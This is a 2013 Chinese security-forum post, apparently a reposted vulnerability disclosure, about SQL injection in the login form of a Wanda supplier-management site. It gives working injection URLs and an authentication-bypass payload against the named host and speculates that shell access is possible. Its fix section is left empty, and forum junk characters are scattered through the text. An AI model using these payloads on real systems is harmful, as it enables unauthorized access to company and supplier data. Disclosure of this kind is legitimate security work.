找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2446|回复: 0
打印 上一主题 下一主题

万达供应商系统SQL注射漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-24 20:16:41 | 显示全部楼层 回帖奖励 |倒序浏览 |阅读模式
简要描述:万达某分站sql注入。敏感信息泄露。! j, A+ u; H' ]: T+ ?* }
详细说明:
' u; k, S5 o2 a& L! u! C6 s' o万达scm系统登陆框sql注入。
' B, i% P6 B$ c/ j9 k, ?3 i
6 e/ ~" D, x( e4 s2 h' b' O; Ihttp://www.vans-china.cn/LoginUser?USERNO=%27&PWD=%27
+ p1 Q6 `6 q! {+ G/ k6 b- a$ K, I0 a- _% K, C3 u" S( k( G2 f
0 S! C; m, p$ j% c* Z! V
500错误。
' I' q- R' p, W; P; O8 j. B
3 q( L: U# g, l5 v4 }3 Q# w用户名随便输,提示没有该用户;USERNO=%27 and 1=1 --&PWD=%27 and 1=1 --提示密码错误。
$ a$ b7 g  Z" s( R: s2 ahttp://www.myhack58.com/Article/UploadPic/2013-3/201332317223677547.png, w4 s4 u0 j3 o( o: K* a0 Q0 W
截图有一点问题,用户名,和密码输入' and 1=1 --可以得到相同的提示,可自测。)
; [- _" F2 D! L% `经过分析,登陆验证的过程应该是:; L- ?8 }$ }  ~5 W
* k( e2 D& f4 x) ~- i
取用户名查询数据库,有该用户,再用该用户密码和输入的密码进行比对,相同则登陆成功。
. ]  L; s6 `! N2 |http://www.myhack58.com/Article/UploadPic/2013-3/201332317233886589.png
# |( O' n* c, Y- |: A
" v( I9 S7 K* R3 P: u1 v5 Aoracle数据库,存在注入点。@大连万达,你怎么看?& X3 w" O) q+ A/ n
http://www.myhack58.com/Article/UploadPic/2013-3/201332317241777393.png
: o* R3 n! f0 X  d
* B  G! p3 i% }- a系统里有万达的供应商资料什么的,提交数据的地方随便输入',提交500错误。没深入。目测可shell。
  z2 ]0 B7 ^* h. Q& v3 u* e8 n漏洞证明:7 n# S' L" E, w$ c* F
万达scm系统登陆框sql注入。) }& I% L! Z/ {% z8 J

& T8 ~- ^& O9 ^, l" Xhttp://www.vans-china.cn/LoginUser?USERNO=%27&PWD=%277 C$ Z9 ?; w8 ~; _/ T
6 d2 U3 _' Q  ]* X' d

' Y, I+ F, a7 S$ d500错误。% c5 a" U. d( I" }$ e

0 p1 A2 @5 Y5 p# a用户名随便输,提示没有该用户;USERNO=%27 and 1=1 --&PWD=%27 and 1=1 --提示密码错误。( X# @/ F7 ?0 U$ a
http://www.myhack58.com/Article/UploadPic/2013-3/20133231728465694.png" B+ n# M4 _% x- G* |2 n" M

( O2 e6 X# j$ e- _& m; `  a' k2 i- H+ M7 x
(截图有一点问题)
$ R  Y9 c" S9 f; @* `
4 m1 T; D4 {$ m+ P7 u怎么饶都饶不过去;经过分析,登陆验证的过程应该是:
! l. q# `% [# J. U2 v# r
, c6 r' C/ R% p5 g+ z% S2 y+ B+ S' ~取用户名查询数据库,有该用户,再用该用户密码和输入的密码进行比对,相同则登陆成功。
' l4 x+ {+ B1 R+ `( R8 r9 ]. u3 o, _* n$ }: _# @/ u0 C2 k3 q
绕过:
/ X, c) }- v: l( Phttp://www.vans-china.cn/LoginUs ... 1%27=%271&PWD=14 P3 c$ c2 D1 t7 B% u

8 g) @2 E% Y3 {# {
9 R9 v7 {$ i/ u& Ooracle数据库,存在注入点。@大连万达,你怎么看?
7 Q* `7 V! w9 y​系统里有万达的供应商资料什么的,有发布公告,没深入。目测可shell。3 a4 B3 P7 F( |. ~
3 f: m0 ^) H% {" X0 E5 ]
修复方案:% s7 g' W5 i- c- u
。。。6 T: i# S  y" K% J% [: r

$ E  P$ M6 o6 v! E6 n5 U
$ _  d: p  F$ K* P' x9 `. p* {' @厂商已经确认- j. N  K, }- U9 e  R, A) @% c

0 y' B+ r. X* Q; w4 I. I/ i; z[/td][/tr]2 d" _0 G. P2 C) g9 `
[/table]7 d! D9 w8 v4 {! T+ v0 V$ y! i$ t

8 W' y6 F! r$ R% X0 O- v6 N6 k
& g! |  q/ H3 k2 K' h
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表